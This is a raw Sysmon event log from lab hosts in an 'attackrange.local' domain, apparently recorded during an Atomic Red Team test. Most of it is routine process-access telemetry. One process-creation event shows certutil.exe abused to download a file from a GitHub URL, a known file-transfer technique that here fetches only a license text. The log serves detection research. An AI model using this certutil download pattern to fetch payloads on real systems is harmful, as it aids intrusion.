21:49:55.232{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917668Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.225{896A638B-B5CB-6058-1600-00000000AE01}13085440C:\Windows\System32\svchost.exe{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917667Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.225{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917666Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.220{896A638B-B403-605B-8269-00000000AE01}8925360C:\Windows\system32\conhost.exe{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917665Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.213{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B403-605B-8269-00000000AE01}892C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917664Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.210{896A638B-B8DD-6058-9202-00000000AE01}36325864C:\Windows\system32\csrss.exe{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917663Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.208{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917662Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.208{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917661Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.208{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917660Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.208{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917659Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.208{896A638B-B5C8-6058-0500-00000000AE01}396512C:\Windows\system32\csrss.exe{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917658Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.207{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005917657Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.207{896A638B-B403-605B-8169-00000000AE01}6800C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" —verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000005917656Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:55.190{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3179C759D0F5A68F4536EC2FDB530319,SHA256=8B8243DD5BAD9FECFD325467B2626A1EF22A4A575A38DD526D797635C697B2AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638520Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.741{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=573A65E83679094C95615E2D6E74DEE5,SHA256=DF9A8349F05F7137AA119B3B447D4EAC55A58B2DF2F7BB039542E3EB662C27D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917700Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:56.730{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917699Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:56.730{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917698Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:56.285{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C27FC64DBF77E19A47E5E92224E8B5F,SHA256=6E2271DF9A1A42231706C0125110A518ED6BEEFA08C68843282F534BD6A8692F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638519Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.382{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65B342E6AA01DCA090E8EC5C9B7ACAD6,SHA256=FB745505998D9FFFE1C967AD443204BF30D95BB8E0B773434BB128684B8EFB54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638518Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B404-605B-2B5A-00000000AF01}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638517Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638516Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638515Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638514Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638513Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638512Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638511Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638510Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638509Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638508Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B864-6058-0500-00000000AF01}628744C:\Windows\system32\csrss.exe{BFB545BB-B404-605B-2B5A-00000000AF01}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638507Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.038{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B404-605B-2B5A-00000000AF01}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638506Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:56.039{BFB545BB-B404-605B-2B5A-00000000AF01}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 